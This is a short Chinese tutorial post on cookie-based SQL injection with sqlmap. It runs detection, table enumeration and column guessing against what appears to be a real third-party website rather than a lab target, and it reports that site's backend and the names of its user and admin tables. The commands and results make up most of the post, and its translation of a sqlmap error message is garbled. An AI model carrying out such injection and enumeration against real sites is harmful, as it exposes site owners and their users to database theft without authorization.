Sqlmap是什么我就不多说了,它就是一个渗透测试工具,主要是用来SQL注入的,支持很多种类型的数据库。用工具sqlmap来做cookie注入很简单,只需要用sqlmap cookie注入命令即可!具体操作如下:
1、检测是否有cookie注入?
root@Kali:~# sqlmap -u http://www.zyczbq.com/Newsshow.asp --cookie "ID=212" --level 3
注意:这里或许很慢,请大家耐心等待即可!
得到如下结果:
存在Cookie注入,布尔类型的盲注等。网站开发语言是ASP,数据库类型是Microsoft Access;服务器系统是Windows;
2、猜表名
root@Kali:~# sqlmap -u http://www.zyczbq.com/Newsshow.asp --cookie "ID=212" --level 3 --tables
3、猜列名
root@Kali:~# sqlmap -u http://www.zyczbq.com/Newsshow.asp --cookie "ID=212" --level 3 -T user --columns
当然,当我再去猜admin表的时候,sqlmap就报错如下:
[CRITICAL] can't use column existence chek because of detected inval id resultes(most probably caused by inability of the used injection to distinguish errornous results)
中文翻译
[CRITICAL]不能使用列存在,因为检测到的内部空间结果(最可能是由于使用的注入无法区分错误结果)
cookie注入方法就是这样的,虽然猜不到列名,不过,不用太在意结果,知道原理即可!还是要以一个正确的学习态度为主。